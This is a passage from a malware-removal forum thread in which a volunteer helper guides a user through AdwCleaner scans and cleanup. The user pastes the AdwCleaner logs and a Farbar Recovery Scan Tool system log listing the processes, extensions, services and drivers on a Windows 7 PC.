A36C5E4F47E84449FF07ED3517B43A31
 

 

 



#8 Johnny Computer

  • Malware Response Team
  • 1,739 posts
  • Gender:Male
  • Location:127.0.0.1
  • Local time:11:21 AM

Posted 26 January 2015 - 07:54 AM

Hi TomFullerton-

"I ought to delete it"

Yes, now you may delete that file.

 


 ---------------------------------------------------------------------------------------------------

 

Please download AdwCleaner by Xplode and save it to your Desktop.

  • Double click on AdwCleaner.exe to run the tool. Vista/Windows 7/8 users right-click and select Run As Administrator.
  • The tool will start to update the database, please wait a bit.
  • Click on the I agree button.
  • Click on the Scan button.
  • AdwCleaner will begin...be patient as the scan may take some time to complete.
  • After the scan has finished, click on the Report button...a logfile (AdwCleaner[R#].txt) will open in Notepad for review (where the largest value of # represents the most recent report).
  • The contents of the log file may be confusing. Unless you see a program name that you know should not be removed, don't worry about it. If you see an entry you want to keep, let me know about it.
  • Copy and paste the contents of that logfile in your next reply.
  • A copy of all logfiles is saved in the C:\AdwCleaner folder, which was created when running the tool.

 

 --------------------------------------------------------------------------------------------------------------

 

IN YOUR NEXT REPLY I NEED:

1.) Confirmation that the "Tom" file has been deleted
2.) AdwCleaner log

Thanks :)

 


"DO OR DO NOT. THERE IS NO TRY."


#9 tomfullerton

  • Topic Starter
  • Members
  • 9 posts
  • Local time:12:21 PM

Posted 26 January 2015 - 06:22 PM

1. The file has been deleted.

2. The report: ***I want to keep the Chrome extension "hcdjknjpbnhdoabbngpmfekaecnpajba" and anything related to it.

 

 

# AdwCleaner v4.109 - Report created 26/01/2015 at 18:15:36
# Updated 24/01/2015 by Xplode
# Database : 2015-01-25.1 [Live]
# Operating System : Windows 7 Ultimate Service Pack 1 (64 bits)
# Username : Tom Jones - SSPC
# Running from : C:\Users\Tom Jones\Downloads\AdwCleaner.exe
# Option : Scan
 
***** [ Services ] *****
 
 
***** [ Files / Folders ] *****
 
File Found : C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_hcdjknjpbnhdoabbngpmfekaecnpajba_0.localstorage
File Found : C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_hcdjknjpbnhdoabbngpmfekaecnpajba_0.localstorage-journal
File Found : C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_static.ak.facebook.com_0.localstorage
File Found : C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_static.ak.facebook.com_0.localstorage-journal
Folder Found : C:\ProgramData\apn
Folder Found : C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\hcdjknjpbnhdoabbngpmfekaecnpajba
 
***** [ Scheduled Tasks ] *****
 
 
***** [ Shortcuts ] *****
 
 
***** [ Registry ] *****
 
 
***** [ Browsers ] *****
 
-\\ Internet Explorer v11.0.9600.17496
 
 
-\\ Google Chrome v
 
 
*************************
 
AdwCleaner[R0].txt - [4039 octets] - [22/01/2015 20:49:39]
AdwCleaner[R1].txt - [1599 octets] - [23/01/2015 23:20:38]
AdwCleaner[R2].txt - [1494 octets] - [26/01/2015 18:15:36]
AdwCleaner[S0].txt - [3706 octets] - [22/01/2015 20:53:34]
AdwCleaner[S1].txt - [1665 octets] - [23/01/2015 23:25:12]
 
########## EOF - C:\AdwCleaner\AdwCleaner[R2].txt - [1674 octets] ##########


#10 Johnny Computer

  • Malware Response Team
  • 1,739 posts
  • Gender:Male
  • Location:127.0.0.1
  • Local time:11:21 AM

Posted 27 January 2015 - 07:45 AM

Hi TomFullerton-

 

Double click on AdwCleaner.exe to run the tool again. Vista/Windows 7/8 users right-click and select Run As Administrator.

  • The tool will start to update the database, please wait a bit.
  • Click on the Scan button.
  • AdwCleaner will begin to scan your computer like it did before.
  • After the scan has finished, UNCHECK all items you would like to keep.
  • This time click on the Clean button.
  • Press OK when asked to close all programs and follow the onscreen prompts.
  • Press OK again to allow AdwCleaner to restart the computer and complete the removal process.
  • After rebooting, a logfile report (AdwCleaner[S#].txt) will open automatically (where the largest value of # represents the most recent report).
  • Copy and paste the contents of that logfile in your next reply.
  • A copy of that logfile will also be saved in the C:\AdwCleaner folder.

 

 ---------------------------------------------------------------------------------------------------------------

 

Please re-run FRST and post both of the logs.

 

-----------------------------------------------------------------------

 

IN YOUR NEXT REPLY I NEED:

1.) AdwCleaner log
2.) FRST logs
3.) How is your system running now? Are you experiencing all, some, or none of the previous issues?

Thanks :)


"DO OR DO NOT. THERE IS NO TRY."


#11 tomfullerton

  • Topic Starter
  • Members
  • 9 posts
  • Local time:12:21 PM

Posted 28 January 2015 - 02:30 PM

Attached 1 and 2.
3. I couldn't really say for sure.
 
 
1. -----------------
 
# AdwCleaner v4.109 - Report created 28/01/2015 at 14:22:24
# Updated 24/01/2015 by Xplode
# Database : 2015-01-26.1 [Live]
# Operating System : Windows 7 Ultimate Service Pack 1 (64 bits)
# Username : Tom Jones - SSPC
# Running from : C:\Users\Tom Jones\Downloads\AdwCleaner.exe
# Option : Clean
 
***** [ Services ] *****
 
 
***** [ Files / Folders ] *****
 
Folder Deleted : C:\ProgramData\apn
[x] Not Deleted : C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\hcdjknjpbnhdoabbngpmfekaecnpajba
[x] Not Deleted : C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_hcdjknjpbnhdoabbngpmfekaecnpajba_0.localstorage
[x] Not Deleted : C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_hcdjknjpbnhdoabbngpmfekaecnpajba_0.localstorage-journal
File Deleted : C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_static.ak.facebook.com_0.localstorage
File Deleted : C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_static.ak.facebook.com_0.localstorage-journal
 
***** [ Scheduled Tasks ] *****
 
 
***** [ Shortcuts ] *****
 
 
***** [ Registry ] *****
 
 
***** [ Browsers ] *****
 
-\\ Internet Explorer v11.0.9600.17496
 
 
-\\ Google Chrome v
 
 
*************************
 
AdwCleaner[R0].txt - [4039 octets] - [22/01/2015 20:49:39]
AdwCleaner[R1].txt - [1599 octets] - [23/01/2015 23:20:38]
AdwCleaner[R2].txt - [1740 octets] - [26/01/2015 18:15:36]
AdwCleaner[R3].txt - [1814 octets] - [28/01/2015 14:20:21]
AdwCleaner[S0].txt - [3706 octets] - [22/01/2015 20:53:34]
AdwCleaner[S1].txt - [1665 octets] - [23/01/2015 23:25:12]
AdwCleaner[S2].txt - [1754 octets] - [28/01/2015 14:22:24]
 
########## EOF - C:\AdwCleaner\AdwCleaner[S2].txt - [1814 octets] ##########
 
 
 
 
 
2. -----------------
 
Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 28-01-2015
Ran by Tom Jones (administrator) on SSPC on 28-01-2015 14:27:25
Running from C:\Users\Tom Jones\Downloads
Loaded Profiles: Tom Jones (Available profiles: Tom Jones)
Platform: Windows 7 Ultimate Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 11 (Default browser: IE)
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(Cisco Systems, Inc.) C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpnagent.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
() C:\Program Files (x86)\ASUS\AXSP\1.00.13\atkexComSvc.exe
() C:\Program Files (x86)\ASUS\AAHM\1.00.14\aaHMSvc.exe
() C:\Program Files (x86)\ASUS\AsSysCtrlService\1.00.11\AsSysCtrlService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Intel Corporation) C:\Windows\System32\IPROSetMonitor.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\sqlservr.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\NisSrv.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
() E:\Program Files (x86)\MSI Afterburner\MSIAfterburner.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
(Flux Software LLC) C:\Users\Tom Jones\AppData\Local\FluxSoftware\Flux\flux.exe
(Logitech©) C:\Program Files (x86)\Logitech\G35\G35.exe
(NETGEAR) C:\Program Files (x86)\NETGEAR\WPN111\WPN111.exe
(Logitech Inc.) C:\Program Files\Logitech\SetPoint II\SetPointII.exe
(Logitech, Inc.) C:\Program Files\Common Files\Logishrd\KHAL2\KHALMNPR.exe
() E:\Program Files (x86)\Sublime Text 3\sublime_text.exe
() E:\Program Files (x86)\Sublime Text 3\plugin_host.exe
(Google Inc.) C:\Users\Tom Jones\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Tom Jones\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Tom Jones\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Tom Jones\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Tom Jones\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Tom Jones\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Tom Jones\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Tom Jones\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Tom Jones\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Tom Jones\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Tom Jones\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Tom Jones\AppData\Local\Google\Chrome\Application\chrome.exe
(Valve Corporation) C:\Program Files (x86)\Steam\Steam.exe
(Google Inc.) C:\Users\Tom Jones\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Tom Jones\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Tom Jones\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Tom Jones\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Tom Jones\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Tom Jones\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Tom Jones\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Tom Jones\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Tom Jones\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Tom Jones\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Tom Jones\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Tom Jones\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Tom Jones\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Tom Jones\AppData\Local\Google\Chrome\Application\chrome.exe
(Valve Corporation) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
(Skype Technologies S.A.) E:\Program Files\Skype\Phone\Skype.exe
(Valve Corporation) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [Kernel and Hardware Abstraction Layer] => C:\Windows\KHALMNPR.EXE [130576 2009-06-17] (Logitech, Inc.)
HKLM\...\Run: [MSC] => C:\Program Files\Microsoft Security Client\msseces.exe [1331288 2014-08-22] (Microsoft Corporation)
HKLM-x32\...\Run: [Logitech G35] => C:\Program Files (x86)\Logitech\G35\G35.exe [1811800 2010-10-05] (Logitech©)
HKLM-x32\...\Run: [JMB36X IDE Setup] => C:\Windows\RaidTool\xInsIDE.exe [43632 2010-01-19] ()
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1021128 2014-11-20] (Adobe Systems Incorporated)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-265094073-1043058997-3425087786-1000\...\Run: [F.lux] => C:\Users\Tom Jones\AppData\Local\FluxSoftware\Flux\flux.exe [1017224 2013-10-23] (Flux Software LLC)
HKU\S-1-5-21-265094073-1043058997-3425087786-1000\...\RunOnce: [Adobe Speed Launcher] => 1422473019
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\NETGEAR WPN111 Smart Wizard.lnk
ShortcutTarget: NETGEAR WPN111 Smart Wizard.lnk -> C:\Program Files (x86)\NETGEAR\WPN111\WPN111.exe (NETGEAR)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\SetPointII.lnk
ShortcutTarget: SetPointII.lnk -> C:\Program Files\Logitech\SetPoint II\SetPointII.exe (Logitech Inc.)
BootExecute: autocheck autochk * sdnclean64.exe
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKU\S-1-5-21-265094073-1043058997-3425087786-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome
HKU\S-1-5-21-265094073-1043058997-3425087786-1000\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_31\bin\ssv.dll (Oracle Corporation)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_31\bin\jp2ssv.dll (Oracle Corporation)
BHO: Adblock Plus for IE Browser Helper Object -> {FFCB3198-32F3-4E8B-9539-4324694ED664} -> C:\Program Files\Adblock Plus for IE\AdblockPlus64.dll (Adblock Plus)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_31\bin\ssv.dll (Oracle Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_31\bin\jp2ssv.dll (Oracle Corporation)
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)
Tcpip\Parameters: [DhcpNameServer] 75.75.75.75 75.75.76.76
 
FireFox:
========
FF Plugin: @java.com/DTPlugin,version=11.31.2 -> C:\Program Files\Java\jre1.8.0_31\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.31.2 -> C:\Program Files\Java\jre1.8.0_31\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin: @microsoft.com/GENUINE -> C:\Windows\system32\Wat\npWatWeb.dll (Microsoft Corporation)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.31211.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32.dll ()
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> E:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @java.com/DTPlugin,version=11.31.2 -> C:\Program Files (x86)\Java\jre1.8.0_31\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.31.2 -> C:\Program Files (x86)\Java\jre1.8.0_31\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> C:\Windows\system32\Wat\npWatWeb.dll (Microsoft Corporation)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-265094073-1043058997-3425087786-1000: @tools.google.com/Google Update;version=3 -> C:\Users\Tom Jones\AppData\Local\Google\Update\1.3.25.11\npGoogleUpdate3.dll (Google Inc.)
FF Plugin HKU\S-1-5-21-265094073-1043058997-3425087786-1000: @tools.google.com/Google Update;version=9 -> C:\Users\Tom Jones\AppData\Local\Google\Update\1.3.25.11\npGoogleUpdate3.dll (Google Inc.)
FF Plugin HKU\S-1-5-21-265094073-1043058997-3425087786-1000: ubisoft.com/uplaypc -> C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\npuplaypc.dll No File
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npatgpc.dll (Cisco WebEx LLC)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\NPOFF12.DLL (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nppdf32.dll (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npwachk.dll (Nullsoft, Inc.)
 
Chrome: 
=======
CHR HomePage: Default -> hxxp://www.yahoo.com/
CHR DefaultSearchURL: Default -> http://www.google.com/search?q={searchTerms}
CHR DefaultSuggestURL: Default -> 
CHR Profile: C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Tab-Snap) - C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\ajjloplcjllkammemhenacfjcccockde [2013-01-18]
CHR Extension: (Google Drive) - C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2012-12-22]
CHR Extension: (Regex Search) - C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\bcdabfmndggphffkchfdcekcokmbnkjl [2014-11-10]
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-05-21]
CHR Extension: (James White) - C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\bkeidgmehkdjmpjodpjkepolokanalkm [2012-12-22]
CHR Extension: (Grooveshark) - C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\blelaljgakacjdeaggpjilljobdmboff [2012-12-22]
CHR Extension: (Adblock Plus) - C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2012-12-22]
CHR Extension: (Google Search) - C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2012-12-22]
CHR Extension: (Bookmark Manager) - C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\gmlllbghnfkpflemihljekbapjopfjik [2015-01-23]
CHR Extension: (ScriptBlock) - C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\hcdjknjpbnhdoabbngpmfekaecnpajba [2015-01-22]
CHR Extension: (Windows Media Player Extension for HTML5) - C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\hokdglbhghcebcopdbanieangmcamaak [2012-12-25]
CHR Extension: (Reddit Enhancement Suite) - C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\kbmfpngjjgdllneeigpgjifpgocmfgmb [2013-08-27]
CHR Extension: (Steam Trader Helper (auto-buy)) - C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\lhoahihokddepjlegpenefeaahdkojog [2014-06-16]
CHR Extension: (Dota 2 Lounge Helper) - C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljmpblpndedodbmceeghpahabeppemed [2014-11-08]
CHR Extension: (DotA 2 Match Ticker) - C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\nejdjlaibiicicciokonbbkecjleilon [2013-07-14]
CHR Extension: (Google Wallet) - C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-07-01]
CHR Extension: (Auto Refresh Plus) - C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\oilipfekkmncanaajkapbpancpelijih [2014-01-16]
CHR Extension: (Enhanced Steam) - C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\okadibdjfemgnhjiembecghcbfknbfhg [2015-01-02]
CHR Extension: (Beautipedia Modified, Chromified) - C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\oolicfpkpnpbaonkibdjkpbchakfdmig [2014-12-18]
CHR Extension: (Page Monitor) - C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\pemhgklkefakciniebenbfclihhmmfcd [2014-01-16]
CHR Extension: (SpeakIt!) - C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\pgeolalilifpodheeocdmbhehgnkkbak [2013-12-01]
CHR Extension: (Gmail) - C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2012-12-22]
StartMenuInternet: Google Chrome.BIP3FHZVCC3YSCWKHHYNR3ZFZM - C:\Users\Tom Jones\AppData\Local\Google\Chrome\Application\chrome.exe
 
==================== Services (Whitelisted) =================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 asComSvc; C:\Program Files (x86)\ASUS\AXSP\1.00.13\atkexComSvc.exe [918144 2010-11-03] ()
R2 asHmComSvc; C:\Program Files (x86)\ASUS\AAHM\1.00.14\aaHMSvc.exe [915584 2010-12-02] ()
R2 AsSysCtrlService; C:\Program Files (x86)\ASUS\AsSysCtrlService\1.00.11\AsSysCtrlService.exe [586880 2010-10-21] ()
S3 c2wts; C:\Program Files\Windows Identity Foundation\v3.5\c2wtshost.exe [15768 2010-02-02] (Microsoft Corporation)
S3 fussvc; C:\Program Files (x86)\Windows Kits\8.1\App Certification Kit\fussvc.exe [142336 2013-08-22] (Microsoft Corporation) [File not signed]
S3 IDriverT; C:\Program Files (x86)\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe [69632 2005-04-03] (Macrovision Corporation) [File not signed]
R2 MsMpSvc; C:\Program Files\Microsoft Security Client\MsMpEng.exe [23784 2014-08-22] (Microsoft Corporation)
R2 MSSQL$SQLEXPRESS; C:\Program Files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\sqlservr.exe [57617752 2009-03-30] (Microsoft Corporation)
R3 NisSrv; C:\Program Files\Microsoft Security Client\NisSrv.exe [368624 2014-08-22] (Microsoft Corporation)
S3 rpcapd; C:\Program Files (x86)\WinPcap\rpcapd.exe [118520 2013-02-28] (Riverbed Technology, Inc.)
S2 SkypeUpdate; E:\Program Files\Skype\Updater\Updater.exe [315496 2014-12-11] (Skype Technologies)
S4 SQLAgent$SQLEXPRESS; C:\Program Files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\SQLAGENT.EXE [427880 2009-03-30] (Microsoft Corporation)
S3 Te.Service; C:\Program Files (x86)\Windows Kits\8.1\Testing\Runtimes\TAEF\Wex.Services.exe [119808 2013-08-22] (Microsoft Corporation) [File not signed]
S3 VsEtwService120; C:\Program Files\Microsoft Visual Studio 12.0\Common7\Packages\Debugger\Services\VsEtwService.exe [87728 2013-10-04] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)
 
==================== Drivers (Whitelisted) ====================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R1 AsIO; C:\Windows\SysWow64\drivers\AsIO.sys [13440 2010-08-24] ()
R2 IntelHaxm; C:\Windows\System32\DRIVERS\IntelHaxm.sys [84992 2014-11-18] (Intel  Corporation)
R3 LADF_DHP2; C:\Windows\System32\DRIVERS\ladfDHP2amd64.sys [62168 2010-09-29] (Logitech)
R3 LADF_SBVM; C:\Windows\System32\DRIVERS\ladfSBVMamd64.sys [377176 2010-09-29] (Logitech)
R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [269008 2014-07-17] (Microsoft Corporation)
R2 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [125584 2014-07-17] (Microsoft Corporation)
S3 NPF; C:\Windows\System32\drivers\npf.sys [36600 2013-02-28] (Riverbed Technology, Inc.)
R3 nvvad_WaveExtensible; C:\Windows\System32\drivers\nvvad64v.sys [40392 2014-03-31] (NVIDIA Corporation)
S3 PCAMp50a64; C:\Windows\System32\Drivers\PCAMp50a64.sys [43328 2006-11-28] (Printing Communications Assoc., Inc. (PCAUSA))
R3 PCASp50a64; C:\Windows\System32\Drivers\PCASp50a64.sys [41280 2006-11-28] (Printing Communications Assoc., Inc. (PCAUSA))
S3 RimVSerPort; C:\Windows\System32\DRIVERS\RimSerial_AMD64.sys [44032 2011-07-20] (Research in Motion Ltd)
S3 rspCrash; C:\Windows\System32\DRIVERS\rspCrash64.sys [13568 2014-07-14] (Resplendence Software Projects Sp.)
R3 RTCore64; E:\Program Files (x86)\MSI Afterburner\RTCore64.sys [13480 2014-05-19] ()
S3 s1018bus; C:\Windows\System32\DRIVERS\s1018bus.sys [113704 2009-03-25] (MCCI Corporation)
S3 s1018mdfl; C:\Windows\System32\DRIVERS\s1018mdfl.sys [19496 2009-03-25] (MCCI Corporation)
S3 s1018mdm; C:\Windows\System32\DRIVERS\s1018mdm.sys [153128 2009-03-25] (MCCI Corporation)
S3 s1018mgmt; C:\Windows\System32\DRIVERS\s1018mgmt.sys [133160 2009-03-25] (MCCI Corporation)
S3 s1018nd5; C:\Windows\System32\DRIVERS\s1018nd5.sys [34856 2009-03-25] (MCCI Corporation)
S3 s1018obex; C:\Windows\System32\DRIVERS\s1018obex.sys [128552 2009-03-25] (MCCI Corporation)
S3 s1018unic; C:\Windows\System32\DRIVERS\s1018unic.sys [146472 2009-03-25] (MCCI Corporation)
S3 SaiK0836; C:\Windows\System32\DRIVERS\SaiK0836.sys [172040 2010-07-08] (Saitek)
R3 SaiMini; C:\Windows\System32\DRIVERS\SaiMini.sys [22792 2010-07-08] (Saitek)
R3 SaiNtBus; C:\Windows\System32\drivers\SaiBus.sys [50056 2010-07-08] (Saitek)
S3 VBoxUSB; C:\Windows\System32\Drivers\VBoxUSB.sys [115488 2014-03-26] (Oracle Corporation)
S3 vpnva; C:\Windows\System32\DRIVERS\vpnva64-6.sys [52080 2013-07-19] (Cisco Systems, Inc.)
R3 WPN111; C:\Windows\System32\DRIVERS\WPN111vx.sys [1075712 2008-08-04] (Atheros Communications, Inc.)
S3 ALSysIO; \??\C:\Users\TOMJO~1\AppData\Local\Temp\ALSysIO64.sys [X]
S3 catchme; \??\C:\ComboFix\catchme.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
 
 
==================== One Month Created Files and Folders ========
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2015-01-28 14:27 - 2015-01-28 14:27 - 00000000 ____D () C:\Users\Tom Jones\Downloads\FRST-OlderVersion
2015-01-27 22:54 - 2015-01-27 22:54 - 00000739 _____ () C:\Users\Tom Jones\AppData\Local\recently-used.xbel
2015-01-27 22:54 - 2015-01-27 22:54 - 00000000 ____D () C:\Users\Tom Jones\AppData\Roaming\Wireshark
2015-01-27 22:06 - 2015-01-27 22:07 - 00000000 ____D () C:\Users\Tom Jones\AppData\Local\HP
2015-01-27 22:06 - 2015-01-27 22:06 - 00000057 _____ () C:\ProgramData\Ament.ini
